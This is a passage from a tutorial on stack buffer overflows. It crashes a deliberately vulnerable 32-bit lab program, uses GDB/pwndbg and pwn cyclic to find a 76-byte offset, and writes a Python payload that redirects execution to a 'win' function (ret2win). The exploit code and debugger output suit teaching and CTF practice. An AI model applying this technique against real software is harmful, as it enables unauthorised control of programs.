So, what is this “Segmentation fault”? A Segmentation fault occurs when a program tries to access a memory segment that it’s not allowed to. This typically happens due to issues like buffer overflows, where the program writes more data to a buffer than it can hold. In our case, by inputting a string that’s too long, we’ve overwritten memory that the program shouldn’t touch, leading to the abrupt termination of the program.
But how does writing more data lead to accessing restricted memory segments? Let’s take a closer look.
Generating and Analyzing Core Dumps
Earlier, we discussed the different types of ELF files, including the CORE
ELF file, which is created when a process crashes. Let’s enable core dump generation and crash our program to see this in action.
First, we need to set the limit for core file size to unlimited:
$ ulimit -c unlimited
Next, we run our vulnerable program:
$ ./vuln
Enter some text:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
After crashing the program, we can see that a core file has been generated, typically named core
:
$ file core
core: ELF 32-bit LSB core file, Intel 80386, version 1 (SYSV), SVR4-style, from './vuln', real uid: 1000, effective uid: 1000, real gid: 1000, effective gid: 1000, execfn: './vuln', platform: 'i686'
Let’s examine the core dump using GDB.
Install pwndbg
To install pwndbg, simply follow these steps:
$ git clone https://github.com/pwndbg/pwndbg
$ cd pwndbg
$ ./setup.sh
Load the core dump in gdb:
$ gdb --quiet -core core
[New LWP 17510]
Core was generated by `./vuln'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x41414141 in ?? ()
------- tip of the day (disable with set show-tips off) -------
Pwndbg resolves kernel memory maps by parsing page tables (default) or via monitor info mem QEMU gdbstub command (use set kernel-vmmap-via-page-tables off for that)
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
EAX 0xff93b8f0 ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
EBX 0x41414141 ('AAAA')
ECX 0xf7ebf8ac ◂— 0
EDX 0
EDI 0xf7f25b60 ◂— 0
ESI 0xff93ba1c —▸ 0xff93d8e4 ◂— 'SHELL=/usr/bin/bash'
EBP 0x41414141 ('AAAA')
ESP 0xff93b940 ◂— 'AAAAAAAAAAAAAAAAAAAA'
EIP 0x41414141 ('AAAA')
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0x41414141
────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ esp 0xff93b940 ◂— 'AAAAAAAAAAAAAAAAAAAA'
... ↓ 4 skipped
05:0014│ 0xff93b954 ◂— 0
06:0018│ 0xff93b958 —▸ 0xf7cc6069 ◂— add ebx, 0x1f7dab
07:001c│ 0xff93b95c —▸ 0xf7cacd43 ◂— add esp, 0x10
──────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────
► 0 0x41414141 None
1 0x41414141 None
2 0x41414141 None
3 0x41414141 None
4 0x41414141 None
5 0x41414141 None
6 0x0 None
──────────────────────────────────────────────────────────────────────────────────────────
We can see that EIP register contains 0x41414141 which is AAAA in hex. The EIP register points to next instruction to be executed. You can refer x86 Assembly Series. Due to supplying multiple A’s into the program buffer, they oveflowed the stack and ended up in the EIP register. Refer to the Stack Working section.
Now that we understand how to overwrite the return address, the next question is: how do we determine how many ‘A’s are actually overwriting it? To tackle this, we can generate a unique 4-byte pattern. This pattern will help us identify the exact offset needed to reach the return address.
$ pwn cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
Next, copy this unique pattern and use it as input for the vulnerable binary:
$ ./vuln
Enter some text:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
Segmentation fault (core dumped)
Now, let’s analyze the generated core dump:
$ gdb -core core
...
ESP 0xff949430 ◂— 'uaaavaaawaaaxaaayaaa'
EIP 0x61616174 ('taaa')
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0x61616174
...
From this analysis, we see that 0x61616174
(which corresponds to ’taaa’) has overwritten the return address.
To find the offset where this occurs, we can use the following command:
$ cyclic -l 0x61616174
76
This tells us that the offset required to overwrite the return address is 76 bytes, which ultimately affects the EIP register.
Let’s generate a exploit in Python and save it as exploit.py
#!/usr/bin/python2
offset = 76
payload = "A"*offset
payload += "BBBB" # EIP
print(payload)
Now, use this exploit to verify our results:
$ ./exploit.py | ./vuln
Enter some text:
Segmentation fault (core dumped)
$ gdb -core core
...
ESP 0xffc95890 —▸ 0xffc95800 ◂— 0
EIP 0x42424242 ('BBBB')
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0x42424242
...
As we can see, we’ve successfully taken control of the EIP register! 🎉 Now we can point it anywhere else, opening up exciting possibilities for exploitation! 🚀
What if we point to the win
function we have in our vuln.c
? First, let’s get the address of the win
function:
$ nm vuln | grep win
08049186 T win
So, the address of the win
function is 0x08049186
. Now, let’s modify our exploit to use this address in hexadecimal byte format:
#!/usr/bin/python2
offset = 76
payload = "A"*offset
#payload += "BBBB" # EIP
payload += "\x08\x04\x91\x86"
print(payload)
However, when we run the exploit, we see that it failed. 😢
$ ./exploit.py | ./vuln
Enter some text:
Segmentation fault (core dumped)
Let’s check the core dump:
$ gdb -core core
...
ESI 0xfffbe16c —▸ 0xfffbe8e4 ◂— 'SHELL=/usr/bin/bash'
EBP 0x41414141 ('AAAA')
ESP 0xfffbe090 —▸ 0xfffbe000 ◂— 0
EIP 0x86910408
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0x86910408
...
Here, we see that EIP contains the address 0x86910408, which is the reverse of our original address 0x08049186. The reason for this is that x86 architecture uses Little Endian format. This means that when a multi-byte value is stored, the least significant byte is placed at the lowest memory address.
To correctly overwrite the EIP with the address of the win function, we need to reverse the byte order in our payload:
#!/usr/bin/python2
offset = 76
payload = "A" * offset
# payload += "BBBB" # EIP
# payload += "\x08\x04\x91\x86"
payload += "\x86\x91\x04\x08" # Correct byte order for EIP
print(payload)
With this final adjustment, we should be able to redirect the flow of execution right to our win function. Now, fingers crossed—let’s run the exploit and see if we land in the win function!
$ ./exploit.py | ./vuln
Enter some text:
You've reached the win function! 🎉
Voilà! 🎊 We’ve successfully redirected the program’s execution to the win
function! Often, developers include these testing or debugging functions during development and forget to remove or disable them later. These so-called “dead code” functions can become vulnerabilities, as attackers can exploit them to gain unintended control over program flow. In CTFs, this technique is often referred to as ret2win
.
Conclusion
In this part, we explored basic binary analysis and learned how to control EIP to redirect execution flow to unintended functions. In the next section, we’ll dive into exploitation techniques for binaries without “win” functions and ways to bypass common security mitigations.
References
Books
Articles